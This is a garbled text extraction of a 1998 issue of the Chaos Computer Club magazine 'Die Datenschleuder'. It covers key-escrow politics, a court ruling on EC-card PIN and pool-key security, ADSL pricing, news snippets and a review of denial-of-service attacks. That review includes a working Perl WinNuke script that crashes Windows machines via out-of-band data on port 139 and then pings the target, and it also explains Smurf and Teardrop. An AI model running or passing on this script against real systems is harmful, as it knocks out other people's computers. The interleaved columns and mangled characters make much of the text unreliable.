Beruflich Dokumente
Kultur Dokumente
DAU MI
MEN T
KIN
O!
ISSN 0930-1045
Herbst 1998, DM 5,00
Postvertriebsstück C11301F #64
Impressum Adressen
Herausgeber:
Erfa-Kreise des CCC
(Abos, Adressen etc.) Hamburg: Treff jeden Dienstag, 20 Uhr in den ClubrŠumen in der
Chaos Computer Club e.V., Schwenckestr. 85 oder im griechischen Restaurant gegenŸber. U-Bahn
Osterstra§e / Tel. (040) 401801-0, Fax (040) 4917689,
Schwenckestr. 85, D-20255 Hamburg,
EMail: ccc@hamburg.ccc.de
Tel. +49 (40) 401801-0,
Berlin: Club Discordia Donnerstags alle zwei Wochen 17-23 Uhr in den
Fax +49 (40) 4917689,
ClubrŠumen, Marienstra§e 11, Hinterhof, Berlin-Mitte, NŠhe Bahnhof
EMail: ofÞce@ccc.de Friedrichstra§e, Tel. (030) 28598600, Fax (030) 28598656, EMail:
Redaktion: ccc@berlin.ccc.de. Briefpost: CCC Berlin, Postfach 640236, D-10048 Berlin.
(Artikel, Leserbriefe etc.) Termine unter http://www.ccc.de/berlin/clubdiscordia.html.
Redaktion Datenschleuder, Chaosradio auf Radio Fritz und Live Stream im Internet i.d.R. am letzten
Postfach 640236, D-10048 Berlin, Mittwoch im Monat von 22.00-01.00 Uhr, Info http://chaosradio.ccc.de,
Tel +49 (30) 285 986 00 Feedback an chaos@orb.de.
Fax +49 (30) 285 986 56 Bielefeld: CCC Bielefeld: Treff jeden Dienstag um 20 Uhr in der GaststŠtte
EMail: ds@ccc.de Extra, Siekerstra§e 23, Bielefeld. Kontakt: M. Gerdes (0521) 121429, EMail:
Druck: St. Pauli Druckerei Hamburg ccc@bielefeld.ccc.de.
ViSdP: Wau Holland Kšln: Chaos Computer Club Cologne (C4), Treff jeden Dienstag um 19:30 in
den neuen (!) ClubrŠumen: Kšrnerstr. 37, 50823 Kšln, http://koeln.ccc.de,
Mitarbeiter dieser Ausgabe:
email: info@koeln.ccc.de, Tel (0177) 7213415.
Andy MŸller-Maguhn (andy@ccc.de),
Mšnchengladbach: Treff: Dienstags um 19:30 im SurferÕs Paradise, Bahner
Doobee R. Tzeck (Auf Mail Entzug),
19 in Mšnchengladbach. http://mg.ccc.de, Kontakt via gregor@ccc.de
Frank Rieger (frank@ccc.de), Tim
Ulm: CCC Ulm, Treff jeden Montag ab 19.00h im ãCafŽ EinsteinÒ in der
Pritlove (tim@ccc.de), Tobias
UniversitŠt Ulm. Info http://www.uni-ulm.de/ccc/
(tobias@ccc.de), Wau Holland
(wau@ccc.de) und weitere.
Die Liste der Chaostreffs in anderen StŠdte Þndet ihr aktuell immer auf
http://www.ccc.de/ChaosTreffs.html
Eigentumsvorbehalt:
Es ist dringend zu empfehlen dort nachzuschauen, da Zeit und Ort bei den
Diese Zeitschrift ist solange Eigen- Treffs noch nicht Ÿberall wirklich Þxiert sind. Deshalb sind alle Angaben
tum des Absenders, bis sie dem Ge- hier ohne GewŠhr. Wer selbst einen Chaostreff ins Leben rufen mšchte,
fangenen persšnlich ausgehŠndigt Þndet alle nštigen Angaben auf obiger Webseite.
worden ist. Zur-Habe-Nahme ist
keine persšnliche AushŠndigung im
Sinne des Vorbehalts. Wird die Zeit- Chaos Family
schrift dem Gefangenen nicht ausge- Bielefeld: FoeBuD e.V., Treff jeden Dienstag um 21.00 Uhr im CafŽ
hŠndigt, so ist sie dem Absender mit (Wissens)Durst in der Heeper Str. 64. PUBLIC DOMAIN
dem Grund der NichtaushŠndigung Veranstaltungsreihe: jeden 1. Sonntag im Monat ab 15 Uhr im Bunker
in Form eines rechtsmittelfŠhigen Ulmenwall, Kreuzstr. 0. siehe http://www.foebud.org/. Briefpost: FoeBuD
e.V., Marktstr. 18, D-33602 Bielefeld, Fax. (0521) 61172, Mailbox (0521) 68000,
Bescheides zurŸckzusenden.
Telefon-Hotline (0521) 175254, Mo-Fr 17-19 Uhr. EMail:
foebud@bionic.zerberus.de. http://www.foebud.org.
Copyright (C) bei den Autoren
Stuttgart: Computerrunde Suecrates, norman@delos.stgt.sub.org.
Abdruck fŸr nichtgewerbliche
…sterreich: Public Netbase, http://www.t0.or.at/
Zwecke bei Quellenangabe erlaubt.
Engagierte ComputerexpertInnen, Postfach 168, A-1015 Wien ?
USA: 2600, http://www.2600.com
Liebe Hacksportfreunde,
die Diskussion um die Sicherheit von EC-
Karten nimmt kein Ende. Warum auch? Vor
kurzem erkannte aber auch das Amtsgericht
Frankfurt am Main, da§ die angeblich so mi§-
brauchsfeindliche Sicherung der Magnetkarten
doch eher gaunerfreundlich zu sein scheint.
Der Pool-Key, der systemweit einheitliche
Zugangscode zu den schŸtzenswerten Magnet-
daten, entpuppt sich dabei als Sollbruchstelle. Ist
er einmal einer ausreichend kriminellen Gruppe
bekannt, ist JEDE Karte auf diesem Planeten ein
potentieller Jackpot. Dies hat sich natŸrlich auch
bei den Edes rumgesprochen Ð wie sonst lie§e
sich das gestiegene Interesse an Geldautomaten
erklŠren? Auch sehr aktiv sind zu unserer grš§ten
700-900 Geldautomatenanlagen (!) sind laut Freude die zahlreichen Chaostreffs, die sich in
ofÞzieller Darstellung in den letzen Jahren den letzten Monaten in ganz Deutschland (und
ãabgŠngigÒ. Was unter diesem Terminus zu anderen LŠndern) gebildet haben. Die Erfah-
verstehen ist verdeutlicht unser Daumenkino rungen, die dort gemacht wurden, werden sicher-
rechts oben: Die rumŠnischen Panzerknacker lich auf dem diesjŠhrigen Congress zur Sprache
sacken hier nicht nur die GeldbŸndel, sondern kommen. Wer einen Treff in seiner NŠhe sucht, sei
gleich den ganzen Apparat ein. Da sind dezent auf unseren Web Server verwiesen: wir
offensichtlich nicht nur ganz blšde Gangster am halten dort eine stets aktuelle Liste aller Treffs
Werk. und Erfa-Kreise vor.
Wieauchimmer Ð auch der CCC ist vor AnlŠ§lich der 1 000 000. Ausgabe der Daten-
EinbrŸchen nicht gefeit. Anfang August wurde schleuder wollen wir Euch ein weiteres Mal
unser DNS-Server Opfer einer Hackattacke und ermuntern, Eure Artikel einzureichen. Brauch-
schwupps war www.ccc.de auf einmal ganz wo bares Material wird nach wie vor mit Freiabos fŸr
anders. Der CCC gratuliert den schšpferisch krea- sich oder seine Freunde belohnt.
tiven Aktiven zur gelungenen Trainingsrunde. We Viel Spa§ am GerŠt!
are amused. Weiter so. Treibt Hacksport! Das Chaos im Herbst
index.html
Krypto-Politik ❒❒❒❒■ JahrtausendendߟgelÞguren ■❒❒❒■
International Crypto-News ❒❒❒■■ Der kaputte Konr@d ■❒❒■❒
CRD Kurzmeldungen ❒❒■❒■ Nach uns der SYN-Flood ■❒❒■■
Hšllenmaschinenbau erfolgreich ❒❒■■■ Deutsche Banken ■❒■■■
EC-Kartenurteil des AG FFM ❒❒■■■ Hackaraoke ■■■❒❒
Aus aller Welt ❒■■❒■ KiPo-Hetze der Kripo ■■■❒■
ADSL Feldversuch ❒■■■■ Quellen im Netz ■■■■■
Höhere Interessen kündigen sich Gesetzen formulierte 2 jŠhrige Frist zum Aufbau
drohend an Der Versuch des der global key escrow structure lŠuft Ende 1998
deutschen Innenministers Kanther, ab. Die Durchsetzung des amerikanischen
eine Mehrheit für seinen erstmals Vorhabens wurde durch eine mehrgleisige
auf dem BSI-Kongress im April Strategie auf den Weg gebracht. ZunŠchst wurden
1997 geäußerten Vorstoß zur allen amerikanischen Firmen die Mšglichkeit
angeboten, die nŠchsten 2 Jahren Ihre Software
Krypto-Regulierung in
quasi mit beliebigen kryptographischen Funk-
Deutschland zu finden, ist ja tionen und SchlŸssellŠngen zu versehen. Um die
erstmal gescheitert. entsprechende Genehmigung fŸr den Zeitraum
Anfang 1997 bis Ende 1998 zu bekommen, mu§-
Das hat allerdings auch mit dem Wahlkampf ten sie lediglich fŸr diesen Zeitraum den Aufbau
zu tun; Kanzler Kohl hat rechtzeitig erkannt, da§ eines entsprechendes key escrowing zusagen. Auf
Krypto-Regulierung kein dem anderen Gleis reiste US-
Thema ist, mit dem sich Sonderbotschafter Aaron
Wahlen gewinnen lassen und die "befreundeten" Staaten ab
deswegen rechtzeitig ein und bearbeitete die ent-
Machtwort innerhalb der sprechend zustŠndigen Stellen
Fraktion gesprochen. mit seinem Propaganda-Mate-
Hintergrund des rial Ÿber deren Inhaltsstoffe
Aktionismus vom April 1997 einiges aber nicht alles bekannt
war ein Ereigniss 4 Monate ist. Mindestens die HŠlfte der
vorher; der fŸr die Durch- Akten dŸrften unter dem
setzung des nordamerika- Stichwort "Innere Sicherheit"
nischen amerikanischen "global bzw. "Organisierte Kriminali-
Key-Escrow Plans"* zustŠndige tŠt" abheftbar sein.
US-Sonderbotschafter Aaron Da§ Kanther mit seinem
hatte Bundeskanzler Kohl und Vorsto§, die amerikanischen
Innenminister Kanther im Interessen in Deutschland zu
Dezember 1996 einen Besuch kommunizieren und durch-
abgestattet. zusetzen gescheitert ist, stimmt
Wen er bei dieser Gelegen- nicht wirklich. Denn eines hat
heit noch besuchte und mit uns die Kanthersche Diskus-
welchen Mitteln diese hohen sion geklaut: 2 Jahre Zeit. 2
Vertreter unserer ehrwŸrdigen Jahre, die wir letztlich dafŸr
Regierung auf die US-Linie brauchten, den Politikern und
gebracht wurden, ist nur der …ffentlichkeit zu
ansatzweise bekannt. Vieles liegt im Bereich der vermitteln, warum es nicht sinnvoll sein kann,
Spekulation; allerdings ist mitunter von da§ jeder BŸrger den NachschlŸssel zu seiner
entsprechend langfristig positionierten VertrŠgen Wohnung bei der šrtlichen Polizeidienststelle hin-
die Rede, deren Wurzeln noch aus den Zeiten der terlegen mu§. Von wegen die Frage nach der
BesatzungsmŠchte stammen. Sicherheit von Polizeidienststellen und der
Wiedemauchimmersei, seitdem sind ja fast 2 Bestechlichkeitsquote von Polizeibeamten;
Jahre vergangen. Die in den amerikanischen Schaffung zentraler Begehrlichkeiten.
"Key Recovery and Export Licensing Intel plans for world domination
Proposal" von Netscape Good afternoon gentlemen,
I've been reading the correspondence on the possibility
Amended Version 0.9 - February 19, 1997 of govt keystroke access with some interest. I'm in a
DRAFT - Netscape ConÞdential slightly odd position as I'm responsible for security in
[By hand:] (Netscape counsel agreed with release.) one of the larger wintel companies. As such I've been
getting quite a feeling of deja vu reading your mails.
Intel and others are moving in exactly this direction
INTRODUCTION: This is a proposal from Netscape
with a number of initiatives, most notably the PC98,
Communications Corporation regarding key recovery
PCXX, and "Wired For Management". WfM in
features in its client and server products. A business
particular is very scary - one of the components is a
timeline is included.
facility for PC's to download and run digitally signed
EXECUTIVE SUMMARY: The key recovery proposal software before the OS is booted - between "the end of
consists of two separate parts. The Þrst part addresses BIOS initialisation and when control is transferred to a
the secure mail (S/MIME) keys (and keys for other high-level OS" in the words of one Intel document. The
local applications) and the second part addresses the code is veriÞed by routines embedded in the BIOS and
SSL keys and related issues. Where possible, Netscape will allegedly use some subset of X.509v3 and PKCS#1.
plans to offer voluntary recovery features for some
As so often happens in circumstances like this I can't
encryption private keys. Corporate customers can deÞ-
risk passing documents directly as I can't be sure of
ne their own key recovery policies. They may decide to
their provenance - I really have no idea which ones are
require key recovery for email applications as well as
now considered trade secrets and which have been
any other application that stores encrypted Þles on
made public. Instead I recommend you have a look at
local or network disks.
the Intel WfM site http://www.intel.com/ial/wfm/
Support for escrow of encryption private keys may be with particular reference to the "Pre-Boot Execution
achieved as follows: Netscape client and server Environment" (PXE) and "System Management BIOS"
products offer CertiÞcate Authorities the capability to SMBIOS). The Microsoft pc98 site is at
only issue a certiÞcate after the private key has been http://www.microsoft.com/hwdev/pc98.htm and
escrowed with an entity chosen by the Intranet the Intel one at
administrator for security policy. The certiÞcate will http://developer.intel.com/design/pc98/
indicate that the corresponding private key has been
And, DM reminds of the DIRT program Ray
escrowed.
Arachelian Þrst posted here: There's an article on page
The proposed plan for SSL does not use explicit escrow 37 of the July 6, 1998 issue of NetworkWorld about a
for SSL keys at the client or the server sides. Rather, new software product for Windows machines that is
since SSL only encrypts data between the client and basically a trojan horse that allows access to all
the server such that the decrypted data is available on keystrokes and Þles on a system from a remote
the server (and clients in some cases), other entities can "America's Most Wanted"-type HQ. I can't Þnd the
obtain the data from the server directly in the case article online at <http://www.networkworld.com>,
access to the plain text data is needed. but you can go the the company's site at
The main point stressed here is that key recovery is <http://www.thecodex.com/dirt.html> to see it.
useful for applications that enable storage of encrypted Sale of DIRT is "restricted to military, government, and
data and should be offered (as an optional feature) in a law enforcement agencies", the article says.
product line, but may not actually provide the desired
result in some other applications. A plan that attempts
to escrow all keys under all scenarios is perhaps too KRAP is at it in the IETF
general and will face issues with scalability,
distribution and legal issues with the escrowed private It has come to my attention that the KRAP (key
keys. recovery alliance program) has submitted an I-D (inter-
net draft) to the IETF for adding GAK (government
[...]
access to keys) to the IPSEC protocols:
[http://www.jya.com/nscp-foia.htm]
7. AUTHOR INFORMATION
Tom Markham
Secure Computing Corp
2675 Long Lake Road
Roseville, MN 55113 USA
Phone: 651.628.2754, Fax: 651.628.2701
EMail: tom_markham@securecomputing.com
Auswandern? Hacken ist in Freunden oder der Familie fehlt: "Starke soziale
Kontakte werden durch schwŠchere ersetzt."
Neuseeland legal
MŸnchen (PC-WELT/5.08.98?) - Das Paradies
Kotzen? McDonald's soll Trendsetter
der Hacker: Nach Meinung von Reg Hammond, bei Geldkarte werden
verantwortlich fŸr die Computerrichtlinien im
Handelsministerium von Neuseeland, kann MŸnchen (Reuters 31.7.1998) - Die Schnell-
jemand, der in einen fremden Rechner eindringt, restaurant-Kette Mc Donald's soll im deutschen
zwar gegebenenfalls wegen Diebstahls oder Handel dem bargeldlosen Zahlungsverkehr mit
"unbefugten Betretens" verantwortlich gemacht der Geldkarte zum Durchbruch verhelfen. Der
werden, doch der Hackversuch selbst ist nicht
strafbar. Rechtsanwalt Ken Moon geht sogar noch
weiter: "Unbefugtes Betreten wird nur dann zum
Verbrechen, wenn ein anderes Delikt hinzu-
kommt, etwa Einbruch". Wer lediglich neugierig
ist, macht sich daher nicht schuldig. Hinzu
kommt, dass das Gesetz sich direkt auf das unbe-
fugte Betreten von Land oder persšnlichem
Eigentum bezieht. Intellektuelles Eigentum wird
in Neuseeland als nicht greifbar und damit nicht
als reales Eigentum angesehen. Selbst das
Lšschen oder Kopieren von Dateien sei daher mit
ziemlicher Sicherheit nicht verfolgbar. Trotzdem
haben weder die Regierung noch die Opposition
derzeit die Absicht, ein Gesetz gegen diese Art
Verbrechen im Netzwerk auf den Weg zu bringen. Deutsche Sparkassen und Giroverband kŸndigte
am Freitag zusammen mit dem Restaurant-
Ausschalten? "Internet macht Unternehmen in MŸnchen an, in einigen Monaten
wŸrden in allen 870 McDonald's Restaurants
depressiv" Terminals fŸr Geldkartenbezahlung und
Geldkarten-LadegerŠte installiert. Das Restaurant-
(ARD/ZDF Videotext, 06.09.98) - Je hŠuÞger Unternehmen sei damit der grš§te Kooperations-
Menschen im Internet unterwegs sind, desto partner der Sparkassen in Sachen Geldkarte. Ziel
depressiver und einsamer fŸhlen sie sich. der Zusammenarbeit sei es, die Geldkarte bei den
Das ist das Ergebnis einer neuen Studie der Verbrauchern populŠr zu machen.
UniversitŠt Pittsburgh. Danach spielt es auch Daneben testet der Sparkassenverband mit der
keine Rolle, wie Menschen das Internet benutzen: Deutschen Bahn auf einer Strecke in Baden-
Ob sie Chatrooms besuchen, E-Mails austauschen WŸrttemberg die Akzeptanz der "elektronischen
oder nach Nachrichten surfen. Geldbšrse". Weitere Kooperationen, etwa mit der
Der Grund liegt nach Ansicht des Sozial- Telekom bei MŸnzfernsprechern, wŸrden
psychologen Robert Kraut darin, da§ die im angestrebt, sagte Manfred KrŸger vom
Internet verbrachte Zeit fŸr Kontakte mit Sparkassenverband.
Briefträger beißen? Post sammelt Éwas ein Nštingspasswort ist? Das ist fŸr den
Fall, da§ man jemandem die Pistole an den Kopf
Daten über Häuser hŠlt um ihn dazu zu bringen, sich einzuloggen.
Nach Eingabe des Nštingspassworts kommt er
(ARD/ZDF Videotext 05.09.1998) - Die Post zwar ins System rein, die Jungs mit den
sammelt Daten Ÿber GebŠude und GrundstŸcke Maschinengewehren kommen dann aber auch
ihrer Kunden, um die Informationen an gleich hinzu.
Werbekunden zu verkaufen. Éda§ es sich natŸrlich auch bei einem
Ein Post-Sprecher bestŠtigte Angaben der Nštingspasswort um eine geschickt getarnte Back
"Bild"-Zeitung, wonach die Post Daten Ÿber 16 Door handeln kšnnte?
Mio.GebŠude gesammelt habe. Die Post spioniere Éda§ wg. der Umstellung auf verschlŸsseltes
jedoch niemand aus. Es wŸrden keine personen- http (https) von www.ccc.de die privaten
bezogenen Daten gesammelt. Die "Bild"-Zeitung Telekommunikationskosten einiger BSI-
zitierte jedoch aus einem Postmagazin fŸr Mitarbeiter nach hochrangigen Aussagen
GeschŠftskunden, wonach die Daten beispielswei- gestiegen ist? Die Firewall des BSI erlaubt beim
se mit Alter und Kaufkraft der Bewohner †bergang zwischen Intranet ins Internet diesen
kombiniert werden kšnnen. Dienst nicht ;-)
Der Bonner Datenschutzbeauftragte Jacob Éda§ es Anzeichen dafŸr gibt, da§ sich die
nannte das Vorgehen der Post in der Zeitung behšrdlich (noch) nicht zugelassenen IMSI-
"problematisch." Catcher (GSM-Zellensimulator, der
VerschlŸsselungsmodus 0 aktiviert) bereits in
privaten HŠnden in Deutschland im Einsatz
beÞnden?
Dreh- und Angelpunkt sŠmtlicher Entscheidungen ist SchlŸssels ermittelt werden, wobei es in der Fachwelt
daher die Beurteilung des Sicheitssystems der Banken, unstreitig ist, da§ es keinerlei Probleme bereitet, die
insbesondere die Frage, ob es fŸr Unbefugte technisch jeweilige PIN zu errechnen, wenn man entweder im
mšglich ist, die geheime PIN zu ermitteln. [...] Besitz des DES- oder eines Pool-SchlŸssels ist.
Aufgrund der durchgefŸhrten Beweisaufnahme sieht Der SachverstŠndige Weber von der Zentralstelle fŸr
es das Gericht nunmehr aber nicht mehr nur fŸr Sicherheit in der Informationstechnik hat bereits in sei-
theoretisch denkbar, sondern fŸr praktisch erwiesen nem Gutachten vom 7.8.1990 fŸr das AG DŸsseldorf
an, da§ die PIN selbststŠndig durch EntschlŸsseln ausgefŸhrt, da§ die korrekte PIN mit einem simplen
anhand der auf der Karte gespeicherten Daten Programm mittels eines PC«s im Bruchteil einer
ermittelt werden kann, das Sicherheitssystem der Sekunde errechnet werden kšnne, wenn man im Besitz
Banken mithin nicht mehr so sicher ist, da§ von einem des DES- oder PoolschlŸssels ist. Auch die vom
Anscheinsbeweis zugunsten der Banken ausgegangen Gericht angehšrten SachverstŠndigen Dr. S. und M.-M.
werden kann. [...] haben dies Ÿbereinstimmend bestŠtigt.
Das Gericht sieht es vielmehr als erwiesen an, da§ der Die bisher von allen Gerichten als wahr unterstellte
DES-SchlŸssel von Unbefugten errechnet werden kann Behauptung der Banken, es sei bis heute nicht
und mittlerweile auch errechnet worden ist. gelungen, den DES-SchlŸssel zu dechiffrieren, ist zur
Das Gericht kann der Behauptung der Beklagten, der †berzeugung des Gerichts mittlerweile jedoch
DES-SchlŸssel beÞnde sich nicht in den Geldausgabe- widerlegt.
automaten, sondern nur in den nationalen Rechen- Grundlage der bisher herrschenden Rechtssprechung
zentren, in dieser Form nicht folgen. Dies mag fŸr den war die Annahme, da§ es nach heutigem wissenschaft-
jetzigen Zeitpunkt und fŸr die Geldausgabeautomaten lichen Kenntnisstand unmšglich sei, den DES-
der Beklagten gelten, fŸr den hier allein entscheidenen SchlŸssel mit herkšmmlichen Mitteln zu dechiffrieren,
Tatzeitraum - Anfang 1997 - gilt diese Aussage aber da der DES-Algorithmus 56 Bits, es also Ÿber 70
nicht, da sie nicht berŸcksichtigt, da§ mittlerweile die Billiarden ... SchlŸssel in Betracht kommen.
sogenannten "neuen PIN-Verfahren" (vgl. Dr. Werner Die von den Gerichten eingeschalteten Sachver-
Schindler, NJW-CoR 1998, 223 ff.) eingefŸhrt worden stŠndigen haben zwar stets betont, da§ es theoretisch
sind, der hier streitige Vorfall aber noch das "alte PIN- denkbar sei, einen entsprechenden Computer zu
Verfahren" betrifft. [...] bauen, mit dem der DES- bzw. Pool-SchlŸssel errech-
Beim alten PIN-Verfahren mu§ zwischen den net werden kšnne, sind aber bisher Ÿbereinstimmend
institutseigenen DES-SchlŸsseln und den sogenannten zu der Schlu§folgerung gelangt, da§ eine derartige
Pool-SchlŸsseln differenziert werden. "Hšllenmaschine" (AG Hannover, Urteil vom 9.5.1997,
WŠhrend die institutseigenen DES-SchlŸssel in der Tat CR 1997, 742 f.) derzeit nicht existiere.
allein in den nationalen Rechenzentren der Banken Der SachverstŠndige Weber ....hat hierzu ... 1990 ...
verwahrt werden, befanden sich die Pool-SchlŸssel in zwei konkrete AnsŠtze zum Bau eines derartigen
jedem Geldausgabeautomaten, da sie in den Anfangs- Computers ...: Entweder werde fŸr 40 Millionen US $
jahren zur Ofßine-Authorisierung institutsfremder ec- ein Spezialcomputer gebaut, der innerhalb eines Tages
Karten dienten. den DES-SchlŸssel errechnen kšnne, oder es werde ein
Der SachverstŠndige Dr. S., Mitarbeiter in der Computer fŸr 4 Millionen US $ gebaut, der dann aber
Abteilung "Kryptographische Sicherheit" beim BSI hat eine Rechenzeit von 2,3 Jahren habe.
in seinem Interview in der NJW-CoR 4/98 (S. 223ff.) Auch der SachverstŠndige Prof. Heuser vom ... (BSI)
ausgefŸhrt, da§ hierzu bei den alten ec-Karten der hat in seinem Gutachten fŸr das OLG Hamm ausge-
Geldausgabeautomat anhand eines im Automaten hin- fŸhrt, da§ ein Computer fŸr mehrere hunderttausend
terlegten Pool-SchlŸssels und dem Offset, einer auf DM zu bauen sei, der innerhalb von 3 bis 4 Monaten
dem Magnetstreifen beÞndlichen, kartenabhŠngigen den geheimen SchlŸssel Þnden kšnne.
vierstelligen Zahl, jede deutsche PIN errechnen Der SachverstŠndige Dr. S. hat bei seiner Anhšrung im
konnte. Beweisaufnahmetermin am 31.7.1998 ausgesagt, da§ es
Nach den alten PIN-Verfahren konnte die PIN daher durchaus vorstellbar sei, da§ jemand auf den
entweder anhand des institutseigenen DES-SchlŸssels Tatzeitpunkt bezogen fŸr ca. 300.000.-- DM einen
(Data Encryption Standard des US-amerikanischen derartigen Spezialrechner hŠtte bauen kšnnen, der
National Bureau of Standards), oder des Pool- dann innerhalb von ca. 3 Monaten den Pool-SchlŸssel
Tante T gibt sich zukunftsträchtig. ADSL steht fŸr Asymetric Digital Subscriber
Ein Feldversuch der Telekom in Line und wurde im FrŸhjahr als die Technik der
Nordhein-Westfalen erprobt das Zukunft gehyped. ADSL kann 8 Mbit in die
erste Mal in Deutschland die neue Richtung zum Kunden und 768 kBit in die zum
ADSL-Technologie. Internet Ÿbertragen. Auch wenn das
Mi§verhŠltnis nicht ganz so kra§ ist, erinnert das
ganze sehr an BTX-Zeiten, wo man mit 1200/74
Da§ die Telekom immer schon eigene Bit zwar recht schnell empfangen konnten,
Vorstellungen von Begriffen wie "gŸnstig" oder senden aber nur mit Tippgeschwindigkeit möglich
"schnell" hat, sollte allgemein bekannt sein. war. Was soll der dumme Kunde auch senden
Deshalb versucht sie auch immer noch, uns einen wollen? Er soll gefŠlligst die ganzen bunten
"superschnellen Internetzugang mit T-Online und Bilder anschauen und froh sein, was er geboten
ISDN" aufzuschwatzen. Feste Internetanbindung bekommt. Neben dem Nachteil der ungleich
gibt es hingegen nur widerwillig und zu Kosten, verteilten Bandbreite ist ADSL aber ganz nett: es
die einfach indiskutabel sind - klar, daß der funktioniert Ÿber die vorhandenen
magenta Riese lieber versucht, seine Kupferleitungen, die weiterhin paralell zum
Standleitungen unters Volk zu bringen, als in Telefonieren genutzt werden kšnnen. Man hat
alternative Wege fŸr den Internetzugang zu dann also Telefon und Standleitung auf einem
investieren. einzigen Aderpaar. Allerdings kann ADSL nur
So wird die Entwicklung von Kabel-Internet, einige tausend Meter ŸberbrŸcken, so da§
in den USA das normalste der Welt, von der T spŠtestens in der nŠchsten Vermittlungsstelle die
behindert, wo es auch immer mšglich ist. Damit Gegenstelle sitzen mu§. Die Vermittlungsstelle
man aber nicht ganz so unangenehm als gehšrt der Telekom, die Gegenstelle gehšrt der
Zukunftsbremser auffŠllt, gibt es den ADSL- Telekom, was ist da anderes zu erwarten, als da§
Pilotversuch, auf den Kritiker bei Bedarf man das ganze auch an das Internet der Telekom,
hingewiesen werden. schlimmer noch T-Online angeklemmt hat.
Wer im FrŸhjahr auf einer rei§erischen Page
Anzeige der Telekom zum Thema ADSL Informationen
bestellt hatte, bekam mit etwas GlŸck Anfang
August einen Anruf, wann man denn kommen
sollte, das ADSL-Modem installieren. Ja, da
hŠtten sich einige gewundert, die nur
Infomaterial angefordert hŠtten; es lŠge jedenfalls
ein Auftrag vor.
Im Feldversuch kostet die Teilnahme
monatlich 48 DM GrundgebŸhr und da es bei der
Telekom Leute gibt, die so geistesgestšrt sind,
paketorientierten Datenverkehr auf einer
Standleitung nach /Nutzungszeit/ abzurechnen,
5 Pfennig die Minute. Das macht 72 Mark fŸr
einen Tag Internet, was immer noch unverschŠmt
teuer ist. Immerhin gibt es keine
InstallationsgebŸhr.
interhemd nerdwear
http://interhemd.prinz.org
Die Industrie zittert, die Banken alle Jahreszahlen von null bis 29 im nŠchsten
bibbern und die TK-Anbieter Jahrtausend liegen und alle anderen in diesem, ist
legen von Panik getrieben Windows NT schlicht "nicht in allen
monströse Geldbeträge auf die Komponenten Y2K-compliant". Durch heftiges
hohe Kante. Diesen Eindruck Marketing sollen alle Kunden, die bisher NT
gewinnt man bei der Lektüre der einsetzen, zum Kauf der dann angeblich Y2K-
kompatiblen Version 5.0 des Betriebssystems
einschlägigen EDV-Literatur, wenn
bewegt werden.
es um das Thema Jahr 2000 geht. Die Streufolgen eines Ausfalls bei einem
System sind nahezu nicht vorauszusehen. Am
Der Config-Port und die Firewall weiteren Hacks darstellen, wobei eventuelle
bieten sicher noch viel Raum zum ethische Bedenken noch auszudiskutieren wŠren.
experimentieren. Eine Art FŸr irgendwelche SpooÞng-basierten Angriffe
Jahresrückblick auf Internet- kann es unter UmstŠnden von Nutzen sein, wenn
basierte "Denial of Service"- ein bestimmter Rechner im Netz ausgefallen ist.
Attacken Als ein mšgliches Beispiel unter vielen wollen wir
hier nur mal das netzweite Sharing von Platten
oder Partitionen via NFS oder SMB zu bedenken
Microsofts NetBIOS-Implementierung bekam, haben, die die Patches dagegen nicht installiert
sobald Daten eintrafen, die anders waren als die hatten und ewig an ihrer KonÞguration 'rum-
erwarteten, ganz heftig Schluckauf. Ein Connect schraubten; "Da stimmt was nicht mit den Netz-
auf werktreibern!"
Port 139, ein paar wirre Zeichen und schon
war der Spa§ vorbei. Gegen OOB war Ÿbrigens Smurf
auch der Microsoft DNS-Server sehr empÞndlich. Unter dem Namen ICMP Storm war das
Erschreckend an der Angelegenheit war die Problem schon lange bekannt. Aber erst das
unglaubliche PrimitivitŠt dieses Fehlers, so da§ DAU-feste Programm Smurf sorgte fŸr weite
man die FunktionalitŠt von winnuke in ein paar Verbreitung. Das war irgendwann im Oktober.
Zeilen selbst zusammenhacken konnte. Zur Smurf basiert auf auf dem alten
allgemeinen Außockerung implementieren wir Broadcastspielchen. Ein Ping auf eine
das ganze mal in Perl, wobei wir als Zugabe noch Broadcastadresse erzeugt eine ganze Menge
prŸfen, ob der Rechner nach dem Angriff auch Antworten. Ein ßood-ping auf eine
wirklich alle Viere von sich gestreckt hat, d.h. Broadcastadresse erzeugt jede Menge Verkehr.
nicht mehr per ICMP-ping erreichbar ist (siehe Wenn man nun die Absenderadresse des Pings
Programmlisting im Kasten). fŠlscht, bekommt das Opfer, dessen Adresse man
Winnuke fand vor allem unter IRC-Usern verwendet hat, die Antworten. Das Opfer
rasante Verbreitung. Da es Windows-Benutzer bekommt unter UmstŠnden soviel TrafÞc, da§ es
durchaus gewohnt sind, da§ ihre Kisten zusammenbricht. Das Ganze hŠngt sehr stark von
abschmieren, nahmen viele das ganze als gegeben der Anzahl der Rechner, die auf einen Broadcast
hin oder rochen erst nach sehr langer Zeit Lunte. antworten ab. Der Broadcast dient
Sogar auf dem CCC'97 soll es noch Leute gegeben gewisserma§en als VerstŠrker. Wenn ich 1000
#!/usr/bin/perl -w
use strict;
use Socket;
use Net::Ping;
require 5.004;
my $host = shift;
my $paddr = sockaddr_in(139, inet_aton($host));
print "Der Computer $host wird heruntergefahren...\n";
socket(NUKE, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or
print "Klappt nicht: $!\n", return;
connect(NUKE, $paddr) or print "Klappt nicht: $!\n";
send(NUKE, "Heil Eris! Ewig Heil Discordia!", MSG_OOB );
close(NUKE);
if ($>) {
print <<"MSG_END";
Ich konnte den OOB-Angriff landen. Leider hast du keine root-Rechte, deshalb
überprüfe bitte selbst mit ping(8), ob $host noch läuft.
MSG_END
} else {
sleep 3;
my $ping = new Net::Ping('icmp');
if ($ping->ping($host)) {
warn "Hmm... $host scheint noch zu laufen.\n";
} else {
print "Rechner wurde ausgeschaltet.\n"
}
}
Teardrop
Teardrop tauchte in der ersten NovemberhŠlfte
auf. Es ist dem Ping of Death nicht unŠhnlich, da
es sich auch die Fragmentierung von IP-Paketen
zu nutze macht. Diesmal wird allerdings nicht
mittels Fragmentierung ein zu gro§es Paket Chatsysteme sind durch idiotensichere DoS-
erzeugt, sondern die Fragmente werden so Pogramme zum Sandkasten-Schlachfeld
erzeugt, da§ sie "Ÿberlappen", was Windows und geworden. Wenn man von den reihenweise mit
Linux zur Freude der restlichen Blue Screens abgerauchten NASA-Windowskisten
Betriebssystempropheten Ÿbelst aus dem Tritt hšrt, kann man sich wohl ein Grinsen nicht
bringt. Auf dem CCC'97 standen noch etliche verkneifen, aber ein echter, zufriedenstellender
